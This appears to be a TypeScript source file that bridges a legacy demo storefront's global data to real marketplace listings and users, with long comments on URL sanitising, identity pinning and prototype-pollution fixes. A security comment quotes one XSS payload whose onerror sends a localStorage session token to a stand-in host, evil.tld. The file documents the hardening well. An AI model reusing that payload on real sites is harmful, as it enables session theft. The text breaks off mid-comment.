// The transport pattern for installing Blake's demo (recon/15-installation-plan.md
// §0, "Option A"): his 65 render*() functions are synchronous and read global
// arrays that data.js declares — there is no fetch/async anywhere in his 5,294
// lines. So instead of rewriting his renderers, we PREFETCH a route's data,
// POPULATE the same global names his renderers already read, then let his
// unmodified render() run. This file is the Phase 1 proof of that pattern on
// exactly one surface: the listings grid ("Browse the Floor" — renderBrowse()
// -> browseItems() -> renderCard(), all in public/web/app.js, all untouched).
//
// THE HARD PART, and why this isn't a straight `window.LISTINGS = ...`: data.js
// declares `const LISTINGS = [...]` and `const USERS = {...}` as CLASSIC
// (non-module) top-level script bindings. Per spec, a classic script's
// top-level `const`/`let` become bindings in the realm's shared GLOBAL
// LEXICAL ENVIRONMENT — visible to every OTHER classic script (that's how
// data.js and app.js already see each other, with zero import machinery) but
// NOT reachable as `window.LISTINGS` (only `var`/`function` do that) and not
// safely reachable from an ES module either. This file (an ES module, like
// every other .ts file in this app) therefore cannot mutate `LISTINGS`
// directly by name. The bridge is `bridgeScriptSource` below: a tiny
// INLINE classic script (not a module) that defines one function on `window`
// whose BODY closes over the shared global lexical scope, so it alone can see
// `LISTINGS`/`USERS`. Everything else — the fetch, the field mapping, the
// gaps named below — is normal, typed, testable TypeScript.
//
// SECURITY (recon 16, L1): Blake's esc() (data.js:828) escapes text (title,
// seller) but is NEVER applied to URL fields — l.image reaches 8 unescaped
// src="..." sinks in app.js, and u.avatar reaches one in data.js's
// avatarHTML(). Before this file existed those fields only ever held Blake's
// own hardcoded asset paths; this is the diff that first pipes real,
// attacker-controllable strings into them (a real user could set an arbitrary
// `avatar` via PATCH /api/users/me — that route ran avatar through a bare
// String() with no URL/host validation, unlike displayName/bio/location on
// the same handler; it now runs checkUserUrl, api-server/src/routes/users.ts).
// safeUrl() below is the other half, and the load-bearing one: it is what
// protects RENDERING, including the rows already sitting in the database from
// before the write path was closed — 10 of the 100 live floor rows carry a
// Google-OAuth avatar host that never passed through that route at all.
//
// 🔴 THE FIRST VERSION OF safeUrl() WAS DEFEATED (recon 21, V1). It returned
// new URL(raw).href and assumed .href could no longer contain a bare `"`.
// That is true of the PATH, QUERY and FRAGMENT — the WHATWG serializer
// percent-encodes `"` in all three — and false of the HOST: `"` is not a
// forbidden host code point, so the host serializer emits it VERBATIM. The
// payload
//
//     http://x"onerror="fetch('//evil.tld/'+localStorage.getItem('gbz_session'))
//
// survived .href byte-intact and closed Blake's src="..." early; six such
// payloads fired their onerror in real Chromium. The lesson recorded here so
// the next edit does not repeat it: a check on the RAW string is worthless
// (the host parser percent-DECODES %22 back to `"`, IDNA-maps U+FF02 to `"`,
// and strips tabs/newlines before serializing — all three reach the same
// bare quote), so the check has to run on .href, AFTER parsing.
//
// Do NOT extend this escaping to title/seller/etc. Blake already escapes
// those as text, and pre-escaping in the transport double-escapes (a title
// like Bob's "Rare" Slab would render as the literal text
// Bob&#39;s &quot;Rare&quot; Slab). This is a URL-only fix.

/* The file's first import, and deliberately from the app's OWN datetime module
   rather than a local Intl call. Both formatters pin America/New_York, which is
   what stops a wallet row dated late in the evening from rendering as the next
   day for a visitor whose machine is set to UTC — the support suite runs under
   TZ=UTC precisely so an unpinned formatter fails a test instead of shipping.

   Note this module is a normal ES module; only bridgeScriptSource is a STRING
   evaluated in Blake's global scope, and nothing imported here is reachable
   from inside it. */
import { EMPTY_DATE, formatDate, formatMonthDay, formatMonthYear, formatClockTime } from "../lib/datetime";
import { getLevelFromPoints } from "./levelFromPoints";
import { gemTierFloorLevel } from "../lib/gemTiers";
import { orderFloor } from "./floorOrder";
import { signedInOrWall } from "./guestWall";

/**
 * Rejects any serialized URL that could break out of an HTML attribute.
 *
 * Deliberately an ALLOWLIST, not a list of known-bad characters: an http(s)
 * `.href` is always printable ASCII (non-ASCII is percent-encoded in the
 * path/query/fragment and punycoded in the host — verified against every
 * avatar and image URL on the live floor), so anything outside \x21-\x7e
 * cannot be legitimate. The four quote/angle characters are then excluded on
 * top, because `'` survives literally in a path or fragment and a backtick
 * survives in a query — harmless in Blake's double-quoted src="..." today,
 * but his files are read-only and permanently unsafe, so this layer must not
 * depend on which quote style he happens to use. A denylist is what got
 * defeated the first time.
 */
const UNSAFE_IN_HREF = /[^\x21-\x7e]|["'`<>]/;

/**
 * URL fields only. Anything that isn't a valid absolute http(s) URL, or that
 * still carries an attribute-breakout character after parsing, becomes ""
 * (renders a broken image icon, never executes).
 */
function safeUrl(raw: unknown): string {
  if (typeof raw !== "string" || raw.length === 0) return "";
  try {
    const url = new URL(raw);
    if (url.protocol !== "http:" && url.protocol !== "https:") return "";
    if (UNSAFE_IN_HREF.test(url.href)) return "";
    return url.href;
  } catch {
    return "";
  }
}

/**
 * Injected as <script>bridgeScriptSource</script> (no src, no type) right
 * after data.js loads and before app.js loads. Classic-script scope shares
 * the global lexical environment data.js's `const`/`let` bindings live in,
 * so this is the ONLY place in the whole install that can touch them by
 * name. Intentionally pure mutation, no fetching, no field-mapping
 * decisions — all of that stays in installFloorListings() below, in normal
 * typed code.
 *
 * Real data ALWAYS wins over Blake's demo personas (recon 16, L3-4). The
 * previous `if (!USERS[handle])` guard meant a real seller who happened to
 * share one of Blake's ten reserved handles (blake, atlasvault, junosound,
 * miacurates, rexplays, kovafinds, marcusvault, pixelpearl, finchmarket,
 * marlowfinds) would have their real listing rendered under BLAKE'S fake
 * persona (his avatar, gem tier, join date, badges) with no indication
 * anything was wrong. Every fixture key is DELETED first (the loop right
 * below), not merely shadowed, so a same-named real seller — including one
 * literally named "blake" — simply occupies the handle outright; there is no
 * separate rename to reconcile (see the IDENTITY block below for why the two
 * can never be live at once).
 *
 * PART 2 (recon/19-fixture-strip-spike.md): the owner's instruction is
 * "delete all sample data" — every one of data.js's 18 top-level fixture
 * bindings (plus the 5 "hybrid" helpers whose default happens to be
 * fixture-derived) is cleared or reassigned here, in the SAME pass that
 * installs real listings/users, so nothing sample-shaped survives even one
 * frame. Method per recon 19 §1: `const` arrays/objects are mutated in
 * place (`.length = 0`, delete each key, `.clear()`); `let`s are simply
 * reassigned — a later classic script may write, not just read, an earlier
 * script's `let`.
 *
 * ⚠️ TRAP 1 (recon 19 §2): USERS must be REPLACED, not added to.
 * `topCollectors()` (data.js:490) ranks `Object.keys(USERS)` unconditionally
 * — if any fixture persona survives, the "ranked by the community"
 * leaderboard keeps them forever. Every existing key is deleted before the
 * real ones go in.
 *
 * The 13 bindings below with no real source wired in THIS PASS (USER_LOOKING,
 * TICKER, EXAMPLE_TRADES, CLOSED_DEALS, PUBLIC_EXTRAS, COLLECTOR_CAT_COUNTS,
 * THREADS, CREATOR, myLookingFor, OFFERS_ON, SAVED, NOTIFICATIONS,
 * MARKET_VITALS) are cleared to empty and left there — Blake's own
 * qualify-then-show gates hide every surface they feed cleanly (recon 19
 * §5: ticker, vitals, the <2-deal verdict section, Trending/Collections
 * rails all vanish silently rather than leaving a heading over nothing).
 * Wiring any of them to a real endpoint is bigger, separate work (recon 19's
 * own HAVE-IT/SHAPE-DIFFERS table), not "strip the sample data."
 *
 * ⚠️ "IN THIS PASS" IS LOAD-BEARING. Several of these thirteen have since
 * been wired by a LATER, separate pass, exactly as this paragraph
 * anticipated — myLookingFor by installWants, THREADS/PUBLIC_EXTRAS by the
 * deal/collections installers, and (card 1218203357125435, "no literals")
 * USER_LOOKING by __gbzSetUserLooking below, called per profile VIEW from
 * profileFixups.ts rather than once at boot for the whole floor. This
 * function's own boot pass still does not touch any of the thirteen; that is
 * the only claim this paragraph ever made.
 */
export const bridgeScriptSource = `
window.__gbzInstallFloor = function (mappedListings, mappedUsers, mappedMyCollection, categoryCounts, boardRow, myDisplayHandle, categoryTiles, myIsAdmin) {
  /* 🔴 SIGNED-IN STATE IS PINNED OFF (recon 23, L5). Blake's demo ships a
     working fake account flow — #/auth's 5-step wizard ends in
     authComplete() (app.js:2584) writing store.authed = true — and every one
     of his 34 store.authed reads then switches the PUBLIC homepage into
     "signed in as @blake" mode against data we have deliberately emptied
     (USERS.blake is undefined after the Trap 1 replacement above, and
     renderProfile/renderWallet dereference it). recon 21 checked ONE writer
     (the demo bar, suppressed in overrides.css) and concluded the state was
     unreachable; authComplete is a SECOND writer that never touches the demo
     bar, so the conclusion was wrong. Rather than chase writers, the state
     itself is made unreachable here — this is the only place that can do it,
     because 'store' is a data.js top-level const (global lexical scope,
     never window.store).

     An ACCESSOR with a no-op setter, deliberately NOT
     { value: false, writable: false }: a non-writable data property is a
     silent no-op only in sloppy mode. app.js carries no "use strict" today,
     but his files are read-only and permanently outside our control, and a
     strict-mode assignment to a non-writable property THROWS — mid-template,
     which is the exact failure mode that leaves the previous view painted
     with dead controls (see RENDERABLE_CATEGORY_SLUGS below). A no-op setter
     cannot throw in either mode. It also keeps the property the same SHAPE
     data.js gave it (data.js:778) instead of turning an accessor into a data
     property.

     configurable: true so a boot retry (WebInstall.tsx resets bootStarted on
     failure and re-injects this script) can redefine it instead of throwing
     on a non-configurable redefinition. */
  /* 🔑 IDENTITY, 2026-08-24, REMAP RETIRED 2026-09-04 (card 1218191737225315,
     Nick's ruling: no demo users on any production marketplace surface).
     'myDisplayHandle' is the caller's own handle, passed through VERBATIM —
     the raw username, exactly as USERS is keyed. Every ownership check in
     app.js compares against that SAME handle — 'USERS[store.me]', and
     'l.seller === store.me' — so there is nothing left to keep in sync.

     🔑 WHY A COLLISION CAN'T HAPPEN AT BOOT. __gbzInstallFloor deletes
     every USERS key and empties LISTINGS (below) BEFORE the real, mapped
     rows go in, so no data.js BOOT fixture is ever live at the same moment
     as a real user — and the two are structurally distinct: fixture LISTINGS
     carry hand-written slug ids ("varsity-68", ...) while fixture USER rows
     carry no id at all (their slugs are the map KEYS); every real row's id
     is the server's own crypto.randomUUID(). A real user whose username is
     literally "blake" therefore keeps their own name; there is no boot
     persona left for it to collide with. ⚠️ The guided TOUR is outside this
     guarantee: tourInstallFixtures overwrites USERS[TOUR_SELLER]
     unconditionally and its restore skips the delete when a real row
     pre-existed (app.js:4426/:4545) — tracked on its own card.

     Recon (card 1218191737225315) also settled what the old remap assumed
     rather than checked: app.js contains ZERO comparisons against the
     literal string "blake". The 13 ownership/identity checks of the two
     shapes named above compare against store.me generically (app.js carries
     4 more identity comparisons of other shapes, all equally generic), and the two spots that DO write the literal handle
     (app.js:2880, :7050) are no-op-blocked by the store.me accessor below,
     same as any other write to it.

     Null for a guest. It feeds OWNERSHIP only — not signed-in state; see the
     authed pin below.

     BOTH properties are accessors with NO-OP SETTERS, and that is the whole
     design — the same doctrine the false-pin used: do not chase writers, make
     the state unwritable. Blake's demo still ships two paths that assign
     identity ('authComplete()' at app.js:2584, and the demo-controls sign-in),
     and v47 gave 'store.me' a REAL setter, so a guest hitting either one would
     otherwise be handed the literal handle "blake". Reading through a frozen
     accessor makes both writes no-ops instead.

     ✅ store.authed NOW TRACKS IDENTITY. THE PIN IS OFF.

     It was pinned false because every surface the flag unlocks rendered from
     the thirteen globals this same function empties. That pin named its own
     exit condition — "the flag comes off as the LAST step of the transactional
     lane, in the change that wires deals/wallet/exchange/checkout to real
     endpoints, never before it and never on its own" — and every one of its
     four stated reasons has since been retired, each by a specific change
     rather than by assertion:

       - "#/wallet throws on u.pts.toLocaleString()"      fixed #651, #660
       - "#/profile throws on u.points.toUpperCase()"     fixed #651, #660
       - "MARKET_VITALS.moved is undefined" on signed-in
         home, painting "undefined in deals today"       fixed #660
       - "that wizard is still prefilled with fabricated
         PII"                                            fixed v48 / #661

     ⇒ MEASURED, not argued. demoAuthedSurfaces.test.ts renders every gated
     route through the REAL installer against Blake's REAL render functions and
     asserts none paints NaN, undefined or [object Object]. #/checkout is
     measured separately with a priced thread and a fed ACCOUNT, because it is
     the one surface that needs both — it shows the real address and card when
     fed, and "No shipping address on file" when not.

     🪤 IDENTITY, NOT A CONSTANT. 'return __gbzMe !== null' means the flag
     answers "did the host hand us a real signed-in handle", so a guest is still
     false and every gate still holds for them. Pinning it TRUE would have been
     the same class of mistake as pinning it false — a constant standing in for
     a fact.

     ⚠️ blockAuthRoute RETIRED 2026-08-31 (third act of its story: first it
     carried every visitor, then guests only, now nobody). It existed because
     the #/auth wizard ended in a demo bypass that fabricated "Email verified"
     over an account nobody created. The wizard is REAL now — its submit paths
     run Tyler's register/login wiring through the __gbzAuth seam
     (src/web/authSeam.tsx) — and /login + /register REDIRECT here, so blocking
     guests off #/auth would close the site's own front door. Blake's own
     redirect still bounces SIGNED-IN visitors home (route()'s authed check),
     which was always the half he owned.

     ⚠️ BOOT-TIME ONLY. The boot is one-shot per tab (WebInstall's bootStarted),
     so signing in mid-session leaves this null until a reload. Both properties
     are configurable: true, so a later reactive pass can redefine them. */
  var __gbzMe = typeof myDisplayHandle === "string" && myDisplayHandle ? myDisplayHandle : null;

  Object.defineProperty(store, "me", {
    get: function () { return __gbzMe; },
    set: function () {},
    enumerable: true,
    configurable: true,
  });

  Object.defineProperty(store, "authed", {
    /* Tracks identity rather than a constant — see the block above. The setter
       stays a no-op for the same reason store.me's does: Blake's authComplete()
       (app.js) writes store.authed = true, and a fake sign-up must not be able
       to grant itself a session the host never issued. */
    get: function () { return __gbzMe !== null; },
    set: function () {},
    enumerable: true,
    configurable: true,
  });

  /* 🔑 store.isAdmin (2026-08-27, card 1217901328215272 — "no admin nav").
     Same accessor shape as store.me/store.authed and the same reason: a
     no-op setter, gated on __gbzMe so a guest can never read true even if
     myIsAdmin were somehow truthy. COSMETIC ONLY — this decides whether
     app.js paints a link to /admin, nothing more; the real boundary is the
     server's requireAdmin on every /api/admin/* route (and AdminGuard's own
     useAuth().isAdmin check client-side on that route), neither of which
     this flag touches or could weaken. */
  var __gbzIsAdmin = __gbzMe !== null && myIsAdmin === true;

  Object.defineProperty(store, "isAdmin", {
    get: function () { return __gbzIsAdmin; },
    set: function () {},
    enumerable: true,
    configurable: true,
  });

  Object.keys(USERS).forEach(function (h) { delete USERS[h]; });
  /* 🔴 TWO defects, one line. USERS is a plain object literal in data.js
     (data.js:9, 'const USERS = {}'), so it inherits Object.prototype — and
     that inheritance is BOTH a crash and a write primitive:

     (1) THE CRASH, live today. route() gates the public-profile view on
     'if (m && USERS[m[1]])' (app.js:3694, 3696) and every Object.prototype
     member is TRUTHY on a plain object. So '#/u/toString' passes the gate,
     renderPublicProfile does 'const u = USERS[handle]' -> the native
     Function, then 'u.level' -> undefined and 'u.badges.map' -> TypeError.
     10 of the 12 enumerated prototype members crash it; the throw escapes
     render(), so the PREVIOUS view stays painted with dead, already-unwired
     controls. Anyone can reach it by typing a URL.

     (2) THE WRITE PRIMITIVE, seller-controlled. 71ab074c gave the mapped-user
     ACCUMULATOR a null prototype, which stopped a seller named '__proto__'
     from poisoning that local object. It did not stop the copy loop directly
     below: 'USERS["__proto__"] = user' on a plain USERS invokes
     Object.prototype's __proto__ SETTER, so the damage simply moved one hop
     downstream into the PAGE-WIDE Object.getPrototypeOf(USERS). Hardening the
     accumulator alone was half a fix.

     Nulling the prototype closes both at the source: prototype members stop
     being truthy (route() falls through to home), and '__proto__' becomes an
     ordinary own key that renders like any other handle.

     ✅ MEASURED SAFE against every USERS access shape in Blake's two files
     (two grep shapes, 'USERS[.[]...' and 26 chars either side): the complete
     set is Object.keys(USERS), Object.values(USERS), and bracket reads/writes
     USERS[expr]. All three are prototype-independent. There is no
     USERS.hasOwnProperty(...), no USERS.toString(), no dotted property access
     on USERS at all. Placed AFTER the delete loop and BEFORE the copy loop so
     the copy itself is already protected.

     🪤 Deliberately NOT a '__proto__' rename special-case: a rename invents a
     handle no account owns and leaves every OTHER prototype member truthy.
     The accumulator's own Object.create(null) below stays — now redundant for
     USERS, still correct for 'userIds', and harmless either way.

     🔴 AND IT MOVED THE CRASH ONE HOP DOWNSTREAM, WHICH IS WHY THE NEXT TWO
     LINES EXIST. Nulling USERS' prototype makes a seller named '__proto__' an
     ORDINARY OWN KEY, so 'Object.keys(USERS)' now YIELDS "__proto__" and that
     string flows out as a handle into every OTHER handle-keyed plain object.
     Measured: 24 mapped rows including a '__proto__' seller, through this
     bridge, then render() — data.js:476's
     '[...live, ...(PUBLIC_EXTRAS[handle] || [])]' gets Object.prototype (truthy,
     so '|| []' never fires; not iterable, so the spread throws), and the throw
     escapes collectionFor <- topCollectors <- renderTopCollections <- render().
     The HOME view dies, and every route with it. normalizeUsername leaves
     "__proto__" unchanged, so the account is registerable: one signup plus one
     active listing takes the site down.

     THE CLASS, enumerated over Blake's two files with two independent grep
     shapes (a handle-flavoured key vocabulary — 'X[handle]', 'X[h]',
     'X[l.seller]', 'X[store.me]', 'X[x.handle]' …; and then every bracket
     lookup in either file whose key expression mentions handle/seller/user/me/
     owner/from/to/with/author/buyer). Both shapes return the SAME three names:

       USERS          — nulled above.
       PUBLIC_EXTRAS  — data.js:476, collectionFor(handle). THE CRASH. Nulled.
       USER_LOOKING   — app.js:1326, renderPublicProfile(handle). Nulled.

     ⚠️ USER_LOOKING does NOT crash today, and the comment must not claim it
     does: 'looking' becomes Object.prototype, whose '.length' is undefined, so
     app.js:1355's 'looking.length ? … : ""' takes the empty branch and the
     '.map' one line below is never reached. It is nulled because it is the same
     leak — a prototype member handed out as if it were a seller's data — one
     '.map' or '.join' away from behaving like PUBLIC_EXTRAS.

     WHY THE OTHER BRACKET-KEYED GLOBALS DO NOT QUALIFY (they are keyed by
     something a handle can never be): pcRun / OFFERS_ON by listings.id,
     REVIEWS by thread id ('t-' + handle, so prefixed out of the prototype
     namespace), SUBCATS / COLLECTOR_CAT_COUNTS by our own category slug enum,
     ATTR_SPECS by subcategory, DASH by a range literal, ACCOUNT by a field
     name, BADGE_SVGS by a glyph from BADGES' own values, and BADGES by an
     element of 'u.badges' — which mapSellerToUser hardcodes to [], so that
     lookup never runs at all. CREATOR / WALLET / MARKET_VITALS / store /
     composerState are never bracket-indexed by anything. */
  Object.setPrototypeOf(USERS, null);
  Object.setPrototypeOf(PUBLIC_EXTRAS, null);
  Object.setPrototypeOf(USER_LOOKING, null);
  for (var handle in mappedUsers) {
    USERS[handle] = mappedUsers[handle];
  }

  LISTINGS.length = 0;
  for (var i = 0; i < mappedListings.length; i++) LISTINGS.push(mappedListings[i]);

  /* THE STORED PRICE CHECK, revealed. mapListingRow now fills 'priceCheck'
     from the listing row's own aiVerdictReason (see parseStoredPriceCheck),
     but Blake's renderDetail only PAINTS the panel when pcRun[id] is true
     (app.js:874) — otherwise it shows the pre-run button and the fabricated
     fallback object sits unrendered behind it. A row that already has a real
     answer should not make a visitor press a button to be told it.

     pcRun is a data.js top-level const (data.js:801), reachable only from
     this classic script — the same reason every other global here is
     mutated from the bridge rather than from TypeScript.

     🪤 CLEARED FIRST, like the thirteen fixture globals above it. pcRun is
     empty at data.js load, so this looks redundant on a first boot — but
     WebInstall resets bootStarted on failure so the whole sequence can run
     again in the same tab, and a reveal left over from the previous attempt
     would raise the flag on a row whose priceCheck the retry did NOT install.
     A raised flag with no value on the row is exactly the pair that renders
     app.js:825's fabrication. */
  Object.keys(pcRun).forEach(function (pcK) { delete pcRun[pcK]; });
  for (var pcI = 0; pcI < LISTINGS.length; pcI++) {
    if (LISTINGS[pcI].priceCheck) pcRun[LISTINGS[pcI].id] = true;
  }

  /* "ONE THING THAT IS OURS" (task brief): the closet reads MY_COLLECTION,
     the floor reads LISTINGS — populate both in the same pass, or a real
     seller's own profile shows "0 Active Items" over their own live
     listings (recon 19 §5, "the mismatch that will read as a bug"). */
  MY_COLLECTION.length = 0;
  for (var j = 0; j < mappedMyCollection.length; j++) MY_COLLECTION.push(mappedMyCollection[j]);

  /* Simple fixture clears — no real source wired in this pass (see the file
     header comment above for why leaving these empty is correct, not a gap). */
  Object.keys(USER_LOOKING).forEach(function (k) { delete USER_LOOKING[k]; });
  TICKER.length = 0;
  /* EXAMPLE_TRADES survives the fixture purge (Blake's board conditional,
     2026-08-28): below 10 real closed deals the hero board cycles these
     clearly-generic sample rows WITHOUT the "· Live" badge (app.js drops it
     off the same CLOSED_DEALS count). CLOSED_DEALS stays cleared until the
     closed-deals endpoint exists — at 10+ real rows boardFeed() goes
     real-only and the badge returns, no further change needed here. */
  CLOSED_DEALS.length = 0;
  Object.keys(PUBLIC_EXTRAS).forEach(function (k) { delete PUBLIC_EXTRAS[k]; });
  Object.keys(COLLECTOR_CAT_COUNTS).forEach(function (k) { delete COLLECTOR_CAT_COUNTS[k]; });
  THREADS.length = 0;
  Object.keys(CREATOR).forEach(function (k) { delete CREATOR[k]; });
  myLookingFor.length = 0;
  Object.keys(OFFERS_ON).forEach(function (k) { delete OFFERS_ON[k]; });
  SAVED.clear();
  NOTIFICATIONS.length = 0;
  Object.keys(MARKET_VITALS).forEach(function (k) { delete MARKET_VITALS[k]; });

  /* Hybrids (recon 19 §1a) — helpers whose DEFAULT value is fixture-derived.

     CATEGORIES[c].tile (2026-08-26, category-tile-images batch): Blake's nine
     tile paths (data.js CATEGORIES, "assets/cat-<slug>.png") were never
     shipped — his own note says production imagery comes from users, "you
     need none of the demo photos" — so every category tile on the homepage
     (mega menu app.js:45, mosaic app.js:257, discover "Browse by Vibe"
     app.js:638) has painted a broken image on every load. categoryTiles
     (installFloorListings) is a real listing's image per slug, first in feed
     order, already safeUrl()'d by mapListingRow — never a raw field, so
     nothing seller-controlled can reach this src="..." sink.

     THE MISS CASE IS "", NOT BLAKE'S BROKEN PATH — measured, not assumed.
     In real Chromium an empty src and his broken path render IDENTICALLY on
     both tile shapes: .mega-tile/.tile carry no background (the global
     button{background:none} reset is never overridden for either), so both
     paint the small broken-image glyph plus alt text; .disc-cattile DOES set
     background:var(--band), and both paint a clean color card with no glyph
     at all there. With no visual winner, "" is still the right call — it
     never issues a request to a path that was never going to exist, matching
     this file's own honest-empty convention everywhere else
     (WALLET.promoCredit.redeemed, ACCOUNT.card) rather than leaving a
     permanent dangling reference to an asset Blake never delivered.

     '|| {}': categoryTiles is the newest param, and at least one existing
     caller (demoCollectionExchange.test.ts's harness, which exercises
     installFloor only to seed MY_COLLECTION for an unrelated Exchange
     assertion) invokes this function positionally with 6 arguments, not 7.
     Defaulting here keeps that caller's every category honestly tile-less
     instead of throwing on undefined[slug] mid-install — the same posture
     categoryCounts already gets from ITS every caller passing at least {}. */
  var tiles = categoryTiles || {};
  for (var c = 0; c < CATEGORIES.length; c++) {
    var real = categoryCounts[CATEGORIES[c].slug];
    CATEGORIES[c].count = typeof real === "number" ? real : 0;
    CATEGORIES[c].tile = tiles[CATEGORIES[c].slug] || "";
  }

  /* Seam 2 (card 1217978408277067) — live per-subcategory counts, feeding
     data.js's subcatsRanked, declared 'let' there for exactly this: a
     'const' binding cannot be reassigned by a later classic script, which is
     why CATEGORIES/USERS above are mutated in place instead of rebound.
     ORDERING ONLY (Blake's ruling, 2026-09-04) — none of the three nav
     consumers (subnavOpen, megaFlip, renderSubcategoryPage, all app.js)
     ever print a count, so this changes what subcatsRanked RETURNS, never
     what anything renders as text.

     Counted from mappedListings only, never mappedCollectionItems — a
     collectionOnly piece is Blake's own "not for sale" state (the CTA it
     swaps to), so it should not be the thing that seeds a sub page a
     visitor can't actually buy from. An absent/"" subcategory (an untagged
     row — the mapper above folds "" to undefined on purpose; see its own
     comment) is skipped, the same falsy check every other consumer of this
     field already uses.

     A sub with zero counted listings is DROPPED, not sorted last —
     SUBCAT_COUNTS' own math has no filter, only a sort, so patching its
     numbers could never turn a 0 into an absence. This replaces
     subcatsRanked outright instead.

     The standalone demo never runs __gbzInstallFloor, so it never reaches
     this reassignment and keeps Blake's static SUBCAT_COUNTS ordering
     (card requirement: the demo's ordering stays as-is). */
  var subcatCounts = {};
  for (var scI = 0; scI < mappedListings.length; scI++) {
    var scL = mappedListings[scI];
    if (scL.collectionOnly || !scL.subcategory) continue;
    var scBucket = subcatCounts[scL.category] || (subcatCounts[scL.category] = {});
    scBucket[scL.subcategory] = (scBucket[scL.subcategory] || 0) + 1;
  }
  subcatsRanked = function (cat) {
    var counts = subcatCounts[cat] || {};
    return (SUBCATS[cat] || [])
      .filter(function (pair) { return (counts[pair[0]] || 0) > 0; })
      .sort(function (a, b) { return (counts[b[0]] || 0) - (counts[a[0]] || 0); });
  };

  profileBio = "";
  dealsSel = null;
  /* Trap 2 (amended for the board conditional): [] is not a safe empty for
     BOARD() — it memoises boardFeed()'s result and an empty array is still
     truthy, so BOARD()[0] throws. EXAMPLE_TRADES now survives the purge, so
     invalidating the memo lets boardFeed() rebuild from real CLOSED_DEALS
     (none yet) + the samples — never []. The boardRow placeholder stays as
     the last-ditch floor for the impossible both-empty state, keeping the
     original trap sealed. */
  _boardFeed = EXAMPLE_TRADES.length ? null : [boardRow];

  /* Crash fixes 1-3 (recon 19 §3) — shaped empties, not blanket delete:
     WALLET and DASH are read through specific sub-paths ("".reduce,
     .bank.connected, DASH[dashRange].views) that a bare {} does not survive. */
  WALLET.spendable = 0;
  WALLET.accumulated = 0;
  WALLET.availableCents = 0;
  WALLET.cards = [];
  WALLET.bank = { connected: false, institutionName: "", last4: "", connectedAt: "" };
  /* Trap 3: shaped empties must be "", never null — WALLET.promoCredit.redeemed
     painted the literal string "Redeemed null" when it was null. The same rule
     holds for campaignId and expires (2026-10-05), which the List & Earn
     credit row reads; see mapWallet. */
  WALLET.promoCredit = { balance: 0, redeemed: "", campaignId: "", expires: "" };
  WALLET.coupons = [];
  WALLET.escrowHeld = [];
  WALLET.escrowPast = [];
  WALLET.payouts = [];

  var dashKeys = ["7D", "30D", "6M", "1Y", "ALL"];
  for (var d = 0; d < dashKeys.length; d++) {
    /* null, never 0: the install has no source for these yet, and app.js
       paints null as the unknown mark. A literal 0 read as a real zero on a
       seller's own Storefront Stats (card 1218203357125435). */
    DASH[dashKeys[d]] = {
      views: null, likes: null, comments: null, shares: null, saves: null, offersIn: null,
      conversion: null, revenue: null, sales: null, trades: null, avgSale: null,
      mostViewed: null,
    };
  }
};

/* Two SIBLING top-level assignments in this SAME classic script, so their
   function bodies close over the identical shared global lexical scope
   __gbzInstallFloor's body does above — the one and only reason this file
   can touch LISTINGS/USERS by name at all (see the file header). Unlike
   __gbzInstallFloor, which runs exactly ONCE at boot, these two stay callable
   for the life of the tab: installRealDiscoverSearch and
   installLiveListingComments (floorTransport.ts) invoke them long after this
   script has finished running its own top-level code. */

/* installRealDiscoverSearch's merge target — and, since card
   1218200003007957 (profileFixups.ts), also a BULK caller's: a seller's
   whole listings page merged one row at a time in a loop, not just a single
   one-off search hit. Both callers share the same identity rule below, so
   one function still covers both. A search result the floor did not
   pre-load must be installed into LISTINGS/USERS before it's handed back to
   app.js, or clicking through to it hits route()'s silent fallback to home
   (app.js:3677-3680 finds nothing, falls through). Checks presence before
   pushing/assigning so a repeat search for the same term (or an item
   already on the floor) can't duplicate it or clobber a for-sale row with a
   stale copy of itself.

   Returns whether THIS row was newly pushed — false for an id already on
   the floor — the same "did this write anything" convention
   __gbzSetListingComments below already returns a boolean for. A bulk
   caller sums it across a whole page of rows to tell a no-op merge (every
   row already present) from one that actually changed LISTINGS, and skip a
   repaint that would show nothing new. */
window.__gbzMergeListing = function (listing, user) {
  var exists = false;
  for (var m = 0; m < LISTINGS.length; m++) {
    if (LISTINGS[m].id === listing.id) { exists = true; break; }
  }
  if (!exists) LISTINGS.push(listing);
  if (!USERS[user.handle]) USERS[user.handle] = user;
  return !exists;
};

/* installLiveListingComments's mutation target. Finds the LISTINGS row by id
   and overwrites its comments/commentCount IN PLACE (never replaces the
   array itself), so the object reference app.js's route() already handed to
   renderDetail stays valid across the later re-render this feeds. Returns
   whether it found a match, so the caller knows whether a repaint is even
   meaningful. */
window.__gbzSetListingComments = function (id, comments) {
  for (var n = 0; n < LISTINGS.length; n++) {
    if (LISTINGS[n].id === id) {
      LISTINGS[n].comments = comments;
      LISTINGS[n].commentCount = comments.length;
      return true;
    }
  }
  return false;
};

/* cardComments' read (src/web/cardComments.ts): the LISTINGS row for one card,
   so the module can hand it to app.js's own renderTakeTop and paint the same
   take block renderCard paints, instead of re-implementing that markup in a
   second place. The row itself, not a copy: the module only reads it. */
window.__gbzListingRow = function (id) {
  for (var q = 0; q < LISTINGS.length; q++) {
    if (LISTINGS[q].id === id) return LISTINGS[q];
  }
  return null;
};

/* commentLikes' read and write (src/web/commentLikes.ts). By COMMENT id, across
   every row: the same comment can sit on a card preview, a detail row and the
   comments modal, and an index key goes stale when a loader re-reads a thread.
   The write updates every copy in place and returns how many it found. */
window.__gbzCommentLikeState = function (commentId) {
  for (var r = 0; r < LISTINGS.length; r++) {
    var cs = LISTINGS[r].comments || [];
    for (var s = 0; s < cs.length; s++) {
      if (cs[s].id === commentId) return { likes: cs[s].likes || 0, liked: cs[s].liked === true, listingId: LISTINGS[r].id };
    }
  }
  return null;
};
window.__gbzSetCommentLike = function (commentId, likes, liked) {
  var found = 0;
  for (var r = 0; r < LISTINGS.length; r++) {
    var cs = LISTINGS[r].comments || [];
    for (var s = 0; s < cs.length; s++) {
      if (cs[s].id === commentId) { cs[s].likes = likes; cs[s].liked = liked; found++; }
    }
  }
  return found;
};

/* installLiveListingComments' SECOND target — the AUTHORS of those comments, as
   USERS entries.

   NOT optional enrichment, the same way mapDealCounterparts is not. USERS only
   ever held floor sellers and deal counterparts, so a commenter who is neither
   is simply absent, and two of Blake's own surfaces then read a person who is
   not there: route() resolves #/u/<handle> only via USERS[m[1]] (app.js:3707)
   and a miss falls through every remaining branch to { view: "home" }
   (app.js:3728), so tapping a commenter's @handle silently lands on the home
   feed; and avatarHTML (data.js:967) paints "?" for them.

   🔑 MERGED, NEVER ASSIGNED — the __gbzInstallDeals form (the "if (!USERS[uh])" presence check),
   not the __gbzInstallFloor form, which deletes every key first. A commenter
   who is ALSO a floor seller or a deal counterpart must keep the richer row
